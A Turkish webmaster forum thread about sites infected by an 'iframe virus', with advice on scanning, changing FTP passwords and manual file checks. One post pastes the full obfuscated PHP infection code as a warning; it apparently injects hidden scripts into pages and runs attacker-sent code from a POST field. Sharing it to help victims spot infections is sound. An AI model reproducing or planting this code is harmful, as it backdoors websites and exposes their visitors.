• 16-07-2009, 21:38:53
    #19
    Kimlik doğrulama veya yönetimden onay bekliyor.
    format atmadan çözme olayı yokmu? bir virüs programı falan icat etmiştir birileri bilen varsa lütfen yazsın
  • 17-07-2009, 02:52:51
    #20
    Üyeliği durduruldu
    benim bugun basima geldi wp tabanli siteme ama fazla bulasmams iframe kodlarini sildim virusun sildigi bi kac kodu yeniden ekledim sorun duzeldi. Ama daha sirada bekleyen 7-8 tane daha site var onlar baya bi ugrastircak gibi bu basliktan sonra fazla ugrasmicagimi anladim
  • 24-07-2010, 20:53:47
    #21
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Arkadaşlar sitemde HTML/FlashFrame.Gen virüsü buluyor avira nasıl temizleyebilirim yardım edermisiniz acil
  • 25-07-2010, 19:23:46
    #22
    Kardeş Ftp programı olarak cute ftp'mi kullanıyorsun?
  • 25-07-2010, 19:41:31
    #23
    normal malware (ücretsiz) ile silebilirsiniz. Aynı şey benimde başıma geldi.
  • 25-07-2010, 20:03:27
    #24
    Gamesites adlı üyeden alıntı: mesajı görüntüle
    Kardeş Ftp programı olarak cute ftp'mi kullanıyorsun?
    Evet cuteftp kullanıyordum fakat derhal sildim ondaki açıktan dolayı girmiş sanırım virüs :S

    wolker adlı üyeden alıntı: mesajı görüntüle
    normal malware (ücretsiz) ile silebilirsiniz. Aynı şey benimde başıma geldi.
    Peki kullanımı basitmidir nasıl kullanıcam dosyaları pc me çekip tarattıracakmıyım?
  • 26-07-2010, 21:14:58
    #25
    Eğerki cute ftp ile iframe virüsü yediysen server'a bile giriş yapabilirler yani server windows serversa kendilerine oturup oluşturup sunucuna bağlanabilirler. Bi eventlerden kontrol et istersen linux yiyormu tam olarak bilmiyorum yanlız.
  • 27-07-2010, 15:34:17
    #26
    Programı kurup scan ediyorsun o hallediyor hepsini. taramadan sonra yine web dosyalarını kontrol et varmı diye, Sonra ftp sifrelerini değiştir. Sorun devam ederse sunucun windows ise aynı programla serverında da tarat. gezginler den indirebilirsin.

    Server a program vs kurarsan ancak o zaman bulaşıyor. Benim linux sunucuma bulaşmıştı mecbur formatlatmıştım.
  • 27-07-2010, 15:41:00
    #27
    Üyeliği durduruldu
    allah o virüsü cikaranların ....

    o virüs bendede vardı arkadaşlar dikkatlice okuyun

    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndD d4bGYnKSl7ZnVuY3Rpb24gdDd4bGYoJHMpe2lmKHByZWdfbWF0 Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcy wkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9k ZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW1 5cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8 fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLC R2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYo JGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJi ZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9y ZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJy M8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcm VnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlsw LTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJi Yhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMjl5WW1WbGN5NWpiMjB2YzNObWJT OXZjbUpsWlhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJH MpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBs YWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbH NlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRz O31mdW5jdGlvbiB0N3hsZjIoJGEsJGIsJGMsJGQpe2dsb2JhbC R0N3hsZjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMo JHQ3eGxmMSkpY2FsbF91c2VyX2Z1bmMoJHQ3eGxmMSwkYSwkYi wkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYp aWYoKCRhPSR2WyduYW1lJ10pPT0ndDd4bGYnKXJldHVybjtlbH NlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1td PWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS 0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5k X2NsZWFuKCk7fW9iX3N0YXJ0KCd0N3hsZicpO2ZvcigkaT0wOy RpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0p O2VjaG8gJHNbJGldWzFdO319fSR0N3hsZmw9KCgkYT1Ac2V0X2 Vycm9yX2hhbmRsZXIoJ3Q3eGxmMicpKSE9J3Q3eGxmMicpPyRh OjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7') ); ?>
    ?>

    şekilde olduğu gibi tüm php dosyalarınıza bakın
    js dosyalarına bakın
    bu şekilde kod varmı?

    64 bit şifrelenmiş şekilde iframe atıyor karaktersizler artık virüs çeşitleri iyice gelişti
    Kb3.php diye bir dosya var shell o da aynı şekilde antivirüs programları buluyor fakat şifreliyorlar akıllılık yapıyorlar sonra bulunmuyor shell hiçbir antivirüs bulmuyor

    ( kaspersky da dahil )
    64 bit şifrelileri bulamıyor
    manuel el ile bakıcaksınız

    kolay gelsin